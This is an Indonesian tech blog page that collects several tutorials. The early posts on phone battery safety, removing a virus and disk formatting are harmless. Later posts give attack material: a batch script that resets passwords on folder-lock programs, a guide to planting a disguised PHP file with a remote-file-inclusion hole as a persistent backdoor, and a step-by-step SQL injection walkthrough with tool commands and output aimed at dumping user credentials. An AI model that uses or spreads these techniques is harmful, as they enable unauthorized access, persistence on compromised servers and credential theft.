Pages

Tampilkan postingan dengan label TutoriaL. Tampilkan semua postingan
Tampilkan postingan dengan label TutoriaL. Tampilkan semua postingan

27 Juli 2010

Tips Menghindari Ponsel Meledak

Masalah meledaknya ponsel ternyata bukan cuma legenda, dua kejadian di atas telah jadi bukti nyata. Benarkah ponsel bisa meledak? Sayang sekali jawabannya ternyata "Ya". Alasan yang paling masuk akal adalah terjadinya arus pendek pada baterai ponsel yang terbuat dari bahan kimia yang dapat memicu terjadinya reaksi kimia kemudian menghasilkan energi panas.

Berikut adalah kiat / tips untuk mencegah terjadinya kecelakaan meledaknya telepon selular (ponsel):
1. Gunakan baterai orisinil
Baterai orisinil melalui tahap pengujian kualitas yang ketat sehingga produk yang dijual mempunyai kualitas yang lebih terpercaya. Jadi jangan sesekali menggunakan baterai ponsel palsu, selain tidak menjaim kualitas juga tidak akan ada pihak yang bertanggung jawab jika terjadi masalah.

2. Tidak memperbaiki baterai rusak
Ketika daya dan umur ponsel mulai melemah drastis lebih baik diganti dengan baterai yang baru. Jangan coba-coba memperbaiki baterai yang sudah rusak. Ini bisa membuat susunan rangkaian unsur pembentuk ponsel menjadi berantakan yang akhirnya akan menyebabkan fungsi ponsel tidak bekerja dengan baik.

3. Tidak membeli baterai bekas
Jika baterai yang dibeli baru saja bisa meledak, apalagi yang bekas. Kita tidak bisa tahu pemakaian barang bekas oleh pemilik sebelumnya kan? Jika baterai sudah pernah dimodifikasi kan bisa repot.

4. Matikan ponsel jika terasa panas
Jika badan ponsel terasa mengeluarkan panas berlebihan segerakan matikan ponsel, ada kemungkinan ini sebagai akibat overheating yang terjadi pada baterai.

5. Kembalikan ponsel bermasalah
Jika ponsel yang Anda beli mengeluarkan panas yang berlebihan segera hubungi pihak vendor untuk meminta ganti dengan ponsel baru.

6. Tidak men-charge pada waktu yang lama.
Ketika ponsel menandakan "Battery is Fully Charge", segerakan untuk mencabut charger. Baterai ponsel yang sudah mencapai posisi penuh namun Anda tetap membiarkannya dalam posisi ter-charge dapat menyebabkan overheating.

7. Tidak menggunakan ponsel saat diisi.
Ketika ponsel di-charge akan terjadi perubahan energi listrik menjadi energi kimia dan juga terjadi arus masuk dan keluar secara bergantian. Apabila ponsel yang sedang diisi kita pakai untuk menelepon maka akan menambah beban pada proses kimia tersebut.

8. Gunakan sarung ponsel
Dengan menggunakan sarung ponsel setidaknya jika terjadi ledakan, risiko kecelakaan bisa diminimalkan. Saat ini kita bisa mendapatkan sarung untuk ponsel dengan mudah, toko aksesoris ponsel dapat ditemui di setiap pusat pertokoan ponsel.

9. Jangan letakkan ponsel di bagian rawan.
Daerah rawan maksudnya bagian tubuh yang memiliki risiko kecelakaan fatal seperti dada yang berdekatan dengan jantung, jadi jangan dibiasakan meletakkan ponsel pada saku kemeja.

10. Mengikuti perkembangan berita teknologi.
Biasakanlah untuk selalu mengikuti perkembangan berita teknologi, biasanya jika terjadi masalah pada suatu produk tak terkecuali ponsel, pihak vendor akan mengumumkannya dengan segera. Selanjutnya kita bisa menggantinya sesuai prosedur yang ditetapkan vendor terkait.

S'moga bermanfaat !
Read rest of entry

23 Juli 2010

6 Langkah Basmi Virus "Luna Maya"

Sebuah virus yang cukup menjengkelkan dengan julukan 'Luna Maya' telah menyebar di Indonesia. Virus ini menampilkan pesan yang agaknya meledek penggemar video porno di Indonesia, dengan menampilkan Pop Up bertuliskan "dasar!! otak bokep.."

Virus itu juga menimbulkan dampak-dampak yang cukup menjengkelkan. Misalnya, drive CD/DVD ROM akan terus terbuka meskipun sudah ditutup secara manual oleh pengguna.

Julukan 'Luna Maya' diberikan pada virus ini karena salah satu file penyebarannya memiliki nama LunaMaya.exe. Virus ini dideteksi sebagai Suspicious_Gen2.LBTU oleh Norman Security Suite.

Nah, berikut adalah 6 langkah untuk mengusir virus ini seperti disampaikan oleh Adi Saputra, analis antivirus dari Vaksincom:

1. Lakukan pembersihan virus pada mode “safe mode”.

    * Untuk masuk pada mode “safe mode”, tekan tombol F8 pada keyboard saat komputer dinyalakan.
    * Pada menu Windows Advanced Options, anda dapat memilih mode “safe mode” atau dapat juga mode “safe mode with networking” dan “command prompt”. Agar lebih mudah pilih saja mode “safe mode”.
    * Biarkan windows berjalan hingga muncul jendela konfirmasi penggunaan “safe mode”. (lihat gambar 12)
    * Klik pilihan “Yes”, untuk menggunakan mode “safe mode” pada jendela konfirmasi tersebut.


2. Matikan proses virus yang aktif pada memory.

    * Gunakan tools pengganti Task Manager dalam hal ini gunakan CurProcess. Download tools CurrProcess pada link berikut ini : http://www.nirsoft.net/utils/cprocess.zip
    * Jalankan CurrProcess, kemudian cari file virus “Amoumain.exe”. Klik kiri file virus, kemudian pilih “Kill Selected Processes”. Jika file virus sudah hilang, maka tutup jendela CurrProcess.


3. Perbaiki registry windows yang sudah di modifikasi oleh virus dengan langkah sebagai berikut :

a. Salin script dibawah ini menggunakan wordpad. Klik menu [Start] à [All Programs] à [Accessoris] à [Wordpad].

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, SuperHidden,0x00010001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, HideFileExt,0x00010001,0
HKLM, SOFTWARE\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\system, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\explorer, NoRun

b. Simpan file dengan nama “repair.inf”. Gunakan pilihan Save as type menjadi Text Document agar tidak terjadi kesalahan.
c. Klik kanan file “repair.inf” kemudian pilih “Install”.

4. Hapus file virus “Luna Maya” dengan ciri-ciri sebagai berikut :

    * Memiliki type file “Application”
    * Memiliki ukuran file “37 kb”
    * Memiliki icon file MS Word


Catatan :

    * Untuk mempermudah pencarian sebaiknya gunakan fungsi Search Windows dengan menggunakan filter file *.exe dan *.inf dan berukuran 37 kb.
    * Hapus file virus yang biasanya mempunyai date modified yang sama.
    * Pastikan hapus file virus utama seperti : Amoumain.exe, Luna Maya.exe, Love.exe, dan nt.bat
    * Log-off komputer, kemudian log-in kembali.


5. Untuk pembersihan yang optimal dan mencegah infeksi ulang, scan kembali menggunakan antivirus yang ter-update dan mengenali virus ini dengan baik.

6. Untuk USB flash atau removable drive yang sudah di rusak atau format oleh virus, sebaiknya gunakan software recovery untuk mengembalikan data yang hilang.

Selamat mencoba !!
Read rest of entry

11 Mei 2010

Format dan Quick Format


Banyak orang yang tidak berani melakukan “Quick Format” dengan alasan “kurang bersih”, “agar harddisk lebih awet”,”agar lebih sempurna” dan alasan lainnya sehingga selalu melakukan format biasa. Masalahnya adalah melakukan format biasa pada harddisk IDE ataupun SATA yang berukuran ratusan GB, bisa memakan waktu berjam-jam.

Ketika hendak melakukan format terhadap sebuah disk, Windows memberikan Anda pilihan yang lebih menyenangkan yaitu “Quict Format” namun pilihan ini seringkali tidak digunakan. Alasannya klasik, kurang bersih ! Apa yang “kurang bersih” ? apa perbedaan antara format biasa dan quick format ? Benarkah agar harddisk benar-benar “bersih” harus dilakukan format biasa ? Bagaimana bila saya telah melakukan “Quick format”, apakah harus melakukan format ulang agar harddisk saya lebih awet ?

Format biasa dan quick format sebenarnya melakukan hal yang sama persis dan hanya ada satu perbedaan diantara keduanya yaitu pengecekan terhadap sektor. Pada format biasa, windows akan melakukan proses pengecekan terhadap seluruh isi harddisk anda terhadap kemungkinan kerusakan pada harddisk dan menandai lokasi yang rusak tersebut agar komputer tidak menggunakannya untuk menyimpan file. Bila lokasi yang rusak tersebut digunakan untuk menyimpan file, tentunya akan menyebabkan file tersebut tidak bisa diambil kembali.


Tahapan pengecekan terhadap setiap sektor yang ada didalam harddisk inilah yang menyebabkan kenapa proses format biasa memakan waktu yang begitu lama. Lalu apakah benar format biasa membuat harddisk anda lebih segar dan lebih bersih ? Tidak sama sekali ! ini adalah pandangan yang sama sekali keliru karena seperti yang telah kami katakan sebelumnya, proses format biasa dan quick format itu sama. Lalu bagaimana dengan pandangan yang mengatakan bahwa format biasa membuat harddisk lebih awet ? Setiap alat elektronik, apapun itu selalu memiliki apa yang dinamakan dengan MTBF (Mean time between failures).

MTBF secara umum bisa diartikan sebagai “umur hidup” sebuah peralatan elektronik, artinya semakin Anda menggunakan sebuah peralatan, umurnya akan semakin pendek. Dengan format biasa, selain harddisk akan digunakan jauh lebih lama, harddisk juga akan bekerja jauh lebih berat sehingga pernyataan bahwa harddisk akan lebih awet tentu saja tidak benar bahkan salah sama sekali karena yang terjadi justru kebalikannya.

Apakah Format Biasa Masih diperlukan ?
Tentu saja ! dan masih sangat penting untuk dilakukan. Data Anda tentu jauh lebih penting daripada harddisk yang harganya tidak seberapa karena itu, melakukan pengecekan terhadap kemungkinan terjadinya kerusakan harddisk pada lokasi tertentu pantas untuk dilakukan namun tidak harus dilakukan pada saat format.

Anda bisa melakukan pengecekan setiap saat terhadap kemungkinan terjadinya kerusakan fisik pada harddisk Anda dengan menggunakan perintah chkdsk /r. Perintah ini akan melakukan pengecekan terhadap kemungkinan terjadinya kerusakan pada harddisk seperti yang dilakukan pada saat format biasa.

Jika Anda telah melakukan format biasa atau pengecekan harddisk dengan perintah chkdsk/r, Anda tidak harus melakukannya lagi dalam waktu dekat apalagi melakukan format biasa berulang kali karena hal tersebut hanya akan menghabiskan waktu Anda yang berharga...

by: jasakom
Read rest of entry

18 Maret 2009

Membuat Script Indonesia Jaya Tembus Password

Ola...Ola....
Neh ada yg terbaru dari jasakom buat ngehack password, mudah-mudahan bermanfaat....

Script atau program mini imut2 ini saya namakan INATAPA, singkatan dari Indonesia Jaya Tembus Password. Mengapa namanya begicu ?

Karena script ini akan mengubah password dari program-program yang anda lupa/tidak tahu passwordnya - akan diubah menjadi password resetnya yaitu Indonesia Jaya.

Mengapa passwordnya harus "Indonesia Jaya"?
Nggak ada alasan khusus sih. Kadang tidak semua program mau menerima password kosong, sehingga mendingan dibuat ada saja.








Scriptnya bisa dibuat dengan Notepad,

Cuplikan scriptnya seperti di bawah ini :




@echo off

Title INATAPA v01 - 2008
echo.
echo INATAPA v01 : Indonesia Jaya Tembus Password versi 01
echo ---------------------------------------------------------------------------
echo Script Kecil untuk membuka file konfigurasi berbagai Program Security
echo.
echo Oleh : Lovepassword - www.lovepassword.blogspot.com
echo Kredit : TopengDigital - www.topengdigital.com
echo.
echo Program ini bebas dicopy serta dimodifikasi oleh siapapun
echo.

:PILIHAN
echo.
echo Silakan pilih Program yang ingin anda buka file konfigurasinya
echo ---------------------------------------------------------------------------
echo.
echo 0. Regedit Standard
echo 1. PC Security (dicoba dengan versi 6.4 ) - www.tropsoft.com
echo 2. FolderGuard (dicoba dengan versi 7.91) - www.winability.com
echo 3. MySecretFolderXP (dicoba dengan versi 4.31) - www.winability.com
echo 4. Hide File and Folder (dicoba dengan versi 3.1 ) - www.softstack.com
echo 5. Folder Lock (dicoba dengan versi 5.90) - www.newsoftwares.net
echo 6. Hide Folder (dicoba dengan versi 3.1 ) - www.hide-folder.com
echo 7. EasyFile nF Protector(dicoba dengan versi 3.9 ) - www.softstack.com
echo 8. Winboost (dicoba dengan versi 4.9 ) - www.winboost.com
echo 9. USB Lock (dicoba dengan versi 2.5 ) - www.advansysperu.com
echo 10. - Keluar dari Program ini
echo 91. - Sikat Semua Program yang terdaftar
echo.
echo Dalam banyak kasus - versi program biasanya tidak ada pengaruhnya.
echo ----------------------------------------------------------------------------
Set /P pilih= Pilih Nomor program :
cls
For %%a In (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 91) Do if "%pilih%"=="%%a" Goto Pilihan_%%a
echo.
echo Salah Input ! Pilihan 0 sd 9 untuk memilih program
echo.
echo Atau pilih 10 untuk keluar atau 91 untuk memilih semua program
echo.
echo Tekan Sembarang Tombol untuk kembali
pause>NUL
cls
Goto PILIHAN



:Pilihan_0
echo 0. Anda memilih membuka proteksi Regedit
echo -----------------------------------------------------------------
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f

echo.
if Not "%Pilih%" == "91" (
echo.
pause
cls
Goto PILIHAN )


:Pilihan_1
echo 1. Anda memilih masuk file konfigurasi PC Security
echo -----------------------------------------------------------------
echo.
if exist %temp%_PCSecurity.reg del %temp%_PCSecurity.reg
Start /wait REGEDIT /E %temp%_PCSecurity.reg "HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsys"
if not exist %temp%_PCSecurity.reg echo Registry PC Security tidak ditemukan
echo.
if not exist %windir%dwpces23.dru echo File Password PC Security tidak ditemukan
echo.

if exist %windir%dwpces23.dru (
echo File Password PC Security ditemukan, Password akan dibackup dan direset
copy %windir%dwpces23.dru %temp%dwpces23.dru
del %windir%dwpces23.dru
echo.)

if exist %temp%_PCSecurity.reg (
echo Registry PC Security ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoft rsyscopp] >> %Temp%obol.reg
Echo "s"=hex:56,11,ad,21,7b,08,bc,1b,6e,c3,93,13,86,04,49,b2,0d,a3,49,b2,60,e8,8c, >>%Temp%obol.reg
Echo 07,5f,ec,9d,0b,0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2,60,e8,8c,07,5f,ec,9d,0b, >>%Temp%obol.reg
echo 0d,a3,49,b2,0d,a3,49,b2,0d,a3,49,b2 >>%Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk PC Security, Masukkan Password : Indonesia Jaya)

echo.
if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)


:Pilihan_2
echo 2. Anda memilih masuk file konfigurasi FolderGuard
echo -----------------------------------------------------------------
echo.
if exist %temp%_FolderGuard.reg del %temp%_Folderguard.reg
Start /wait REGEDIT /E %temp%_FolderGuard.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityFGD"

if exist %temp%_FolderGuard.reg (
echo Registry Folderguard ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityFGD] >> %Temp%obol.reg
Echo "FGP"=hex:46,47,50,00,09,04,00,00,73,bc,00,00,00,00,00,00,00,00,00,00 >> %Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk Folderguard, Masukkan Password : Indonesia Jaya)

if not exist %temp%_Folderguard.reg echo Registry FolderGuard tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

:Pilihan_3
echo 3. Anda memilih masuk file konfigurasi My Secret Folder XP
echo -----------------------------------------------------------------
echo.
if exist %temp%_MySecretFolder.reg del %temp%_MySecretFolder.reg
Start /wait REGEDIT /E %temp%_MySecretFolder.reg "HKEY_LOCAL_MACHINESOFTWAREWinabilityMySecretFolder"

if exist %temp%_MySecretFolder.reg (
echo Registry My Secret Folder XP ditemukan, Password akan dibackup dan direset
Echo Windows Registry Editor Version 5.00 > %Temp%obol.reg
Echo [HKEY_LOCAL_MACHINESOFTWAREWinAbilityMySecretFolder] >> %Temp%obol.reg
Echo "AdminData"=hex:a9,47,dd,be,cf,04,ef,2e,f4,43,d8,0f,bd,ad,92,bb,18,5a,2e,5e >> %Temp%obol.reg
Start /w REGEDIT /S "%temp%obol.reg"
del %Temp%obol.reg
echo.
echo * Untuk masuk My Secret Folder XP, Masukkan Password : Indonesia Jaya)

if not exist %temp%_MySecretFolder.reg echo Registry My Secret Folder XP tidak ditemukan
echo.

if Not "%Pilih%" == "91" (
echo.
echo - Tekan sembarang Tombol
pause>nul
cls
Goto pilihan)

DAN SETERUSNYA >>>


Daripada para teman pusing mengetik, silakan anda Download aja disini :
http://www.ziddu.com/download/3624397/INATAPA.zip.html


Script tersebut sudah dilengkapi kemampuan membackup password aslinya. Hanya saja tidak ada fitur untuk mengembalikan password lama yang direset tadi. Mungkin akan saya buat sambungannya dengan script yang lain.

SALAM

by : Jasakom
Read rest of entry

27 Januari 2009

Membuat Control Panel Sendiri


BUAT FOLDER

Untuk membuat “Control Panel” sendiri, pertama kita buat sebuah folder. Klik kanan tombol Start dan kemudian pilih Explore. Ketika folder Start Menu tampil, klik ganda folder Programs. Ketika folder Programs tampil, klik menu Organize pada toolbar Windows Explorer dan kemudian pilih New Folder. Selanjutnya, beri nama folder tersebut My Control Panel atau apa pun yang Anda suka.

GANTI ICON FOLDER

Sekarang, klik kanan folder My Control Panel, dan kemudian pilih Properties. Pilih tab Customize, dan kliktombol Change Icon pada panel Folder icons. Ketika kotakdialog Change Icon tampil, pilih icon untuk membedakan foldetersebut dari semua folder lainnya pada menu Start.

SERET FOLDER KE MENU START

Sekarang, seret folder My Control Panel dari folder Pro-grams dan arahkan ke tombol Start. Ketika menu Start terbuka, seret folder My Control Panel dan jatuhkan ke bagian paling atas menu Start. Sampai di sini, Anda bisa memasukkan tools ke “Control Panel”.

MASUKKAN TOOL (1)

Untuk memasukkan tools ke “Control Panel”, buka folder My Control Panel dari menu Start. Selanjutnya, buka Control Panel yang asli dan pilih Classic View. Sekarang, seret dan jatuhkan tools yang paling sering Anda gunakan dari Control Panel yang asli ke folder My Control Panel. Biasanya membuat shortcut dengan cara drag-and-drop sudah mencukupi. Namun seperti yang Anda ketahui, banyak tools yang terdapat di dalam tool lain. Sebagai contoh, untuk ke Display Settings, Anda harus membuka Personalization dulu.

MASUKKAN TOOL (2)

Untungnya beberapa shortcut command line tools lama masih eksis di Windows Vista dan Anda bisa meng-gunakannya. Tools Control Panel Windows Vista bisa ditemukan di folder Windows\System32 (dalam file CPL). Anda bisa menjalankannya dengan menggunakan format perintah: control tool.cpl di mana tool adalah tool Control Panel. Jika tool tersebut mempunyai beberapa tab, Anda bisa membuat shortcut langsung ke tab yang dituju dengan menggunakan format perintah: control tool.cpl,,# di mana # adalah nomor tab yang dituju. Beberapa shortcut command line bisa Anda lihat pada boks.

GANTI NAMA SHORTCUT

Ketika menyeret tools, Windows Vista akan membuat shortcut ke tools tersebut. Windows Vista akan menambahkan “- Shortcut” ke setiap nama tools. Tentu saja, Anda bisa menghapus tambahan tersebut dan mengganti nama sesuai yang diinginkan. Ketika sudah selesai, tutup folder My Control Panel dan Control Panel yang asli. Sekarang ketika Anda ingin menjalankan tools yang sering digunakan, cukup klik tombol Start dan pilih icon My Control Panel.

SHORTCUT COMMAND LINE CONTROL PANEL

  • Kategori Personalization: tab Display Settings (desk.cpl), Desktop Icon Settings (control desk.cpl,,0), Screen Saver Set-tings (desk.cpl,,1), dan Appearance Settings (desk.cpl,,2).
  • Ketegori System Properties: tab Computer Name (sysdm. cpl), Hardware (sysdm.cpl,,2), Advanced (sysdm.cpl,,3), System Protection (sysdm.cpl,,4), dan Remote (sysdm.cpl,,5)
  • Kategori Internet Properties: tab General (inetcpl.cpl), Security (inetcpl.cpl,,1), Privacy (inetcpl.cpl,,2), Content (inetcpl. cpl,,3), Connections (inetcpl.cpl,,4), Programs (inetcpl.cpl,,5), dan Advanced (inetcpl.cpl,,6).
  • Kategori Mouse Properties: tab Buttons (main.cpl), Pointers (main.cpl,,1), Pointer Options (main.cpl,,2), Wheel (main.cpl,,3), dan Hardware (main.cpl,,4).
  • Kategori Regional and Language Options: tab Formats (intl.cpl), Location (intl.cpl,,1), Keyboards and Languages (intl. cpl,,2), dan Administrative (intl.cpl,,3).
  • Kategori Sound: tab Playback (mmsys.cpl), Recording (mmsys.cpl,,1), dan Sounds (mmsys.cpl,,2).
  • Read rest of entry

    Simple PHP Bacdoor

    nah gini nich...

    okeh langsung ajah

    kalo pas dapet target RFI naluri temen-temen pasti yang pertama langsung pasang backdoor

    dan patch bugnya.

    kalo ngga langsung buru-buru ke /tmp trus utak atik di situ :p

    trik untuk menghidari mafia tukang patch bug dan tukang delete backdoor orang

    yang kita singkat namanya menjadi (MTPBDTDBO)

    xixixxi chain_loader banget :p


    nah jadi kepikiran kalo bugnya di patch kan jadi ngga bisa masuk lagi

    kenapa ngga bikin bug aja sendiri :p


    dengan asumsi para MTPBDTDBO tadi selalu memperhatikan ukuran file dan nama file yang mencurigakan


    langsung aja pas giliran kita dapet kesempatan upload atau cread file

    langsung bikin nama file yang ngga mencurigakan misal

    error.php atau terserah kalian lah yang kira-kira menurut kalian nagga mencurigakan

    kita contohkan dengan error.php

    nah kita isi filenya dengan bug RFI



    nah kan kita sekarang punya file backdoor dengan ukuran yang tidak mencolok alias sangat kecil

    cara pakainya seperti inject RFI seperti biasa


    error.php?error= <<>

    misal:

    http://kecemplungkalen.co.cc/error.php?error=http://webtempat.in/inject_kamu.txt???


    dan kita ahirnya punya backdoor yang ngga mencurigakan dan semoga awet sampai anak cucu kita


    pesan buat mafia tukang patch bug dan tukang delet backdoor orang (MTPBDTDBO)

    sadarlah kalian wahai tukang delete backdor orang

    By : Jasakom

    Read rest of entry

    Tutorial SQL Injection Dengan Menggunakan Schemafuzz.py

    Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

    tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

    ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut


    pertama-tama kita cari target dengan google dan ditemukan:

    misalnya

    http://127.0.0.1/site/phpweb/forum.php?forum=1


    sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

    caranya seperti ini ./schemafuzz.py -h help

    kita temukan sebagian perintahnya seperti ini

    --schema, --dbs, --dump, --fuzz, --info, --full, --findcol


    langkah pertama

    ----------------

    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

    diperoleh seperti ini

    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

    [+] Evasion Used: "+" "--"

    [+] 01:32:04

    [+] Proxy Not Given

    [+] Attempting To find the number of columns...

    [+] Testing: 0,1,2,3,4,5,

    [+] Column Length is: 6

    [+] Found null column at column #: 1

    [+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

    [+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

    [-] Done!


    langkah kedua

    --------------

    setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

    diperoleh seperti ini

    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:37:09

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Number of tables names to be fuzzed: 354

    [+] Number of column names to be fuzzed: 263

    [+] Searching for tables and columns...


    [+] Found a table called: mysql.user


    [+] Now searching for columns inside table "mysql.user"

    [!] Found a column called:user

    [!] Found a column called:password

    [-] Done searching inside table "mysql.user" for columns!


    [-] [01:37:48]

    [-] Total URL Requests 618

    [-] Done


    langkah ketiga

    ---------------

    Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:43:11

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Showing Tables & Columns from database "webthings"

    [+] Number of Tables: 33


    [Database]: webthings

    [Table: Columns]

    [0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

    [1]wt_articles_title: article_id,category,title,active,date,userid,views

    [2]wt_articlescat: cod,category

    [3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

    [4]wt_banners_log: banner,date,views,clicks,sessions

    [5]wt_banners_rawlog: banner,type,date,session

    [6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

    [7]wt_comments: cod,type,link,date,userid,comment

    [8]wt_config: id,config

    [9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

    [10]wt_downloadscat: cod,ref,name,descr

    [11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

    [12]wt_faq_topics: cod,name

    [13]wt_forum_log_topics: uid,msgid,logtime,notifysent

    [14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

    [15]wt_forums: cod,title,descr,locked,notifies,register

    [16]wt_forums_mod: forum,userid,type

    [17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

    [18]wt_links: id,category,active,name,url,count,descr,obs

    [19]wt_linkscat: cod,name,descr,parent_id

    [20]wt_menu: id,pos,title,url,type,newwindow,lang

    [21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

    [22]wt_newscat: cod,name,image

    [23]wt_online: id,time,uid

    [24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

    [25]wt_picofdaycat: id,name,description

    [26]wt_picofdaysel: date,picture_id,views,clicks

    [27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

    [28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

    [29]wt_user_access: userid,module

    [30]wt_user_book: userid,cod_user

    [31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

    [32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

    newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail


    [-] [01:43:48]

    [-] Total URL Requests 270

    [-] Done


    untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

    maka akan tampil seperti ini


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:46:51

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a


    [+] Do we have Access to MySQL Database: Yes <-- w00t w00t

    [!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--


    [+] Do we have Access to Load_File: No


    [-] [01:46:51]

    [-] Total URL Requests 3

    [-] Done


    ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe


    untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

    akan tampil seperti ini


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:58:15

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Showing all databases current user has access too!

    [+] Number of Databases: 1


    [0]webthings


    [-] [01:58:17]

    [-] Total URL Requests 30

    [-] Done


    langkah selanjutnya

    --------------------


    cara untuk menemukan user dan password

    kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom

    setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password


    eing ing eng....

    jreennnng....keluar deh user ama passwordnya

    hasilnya dibawah ini


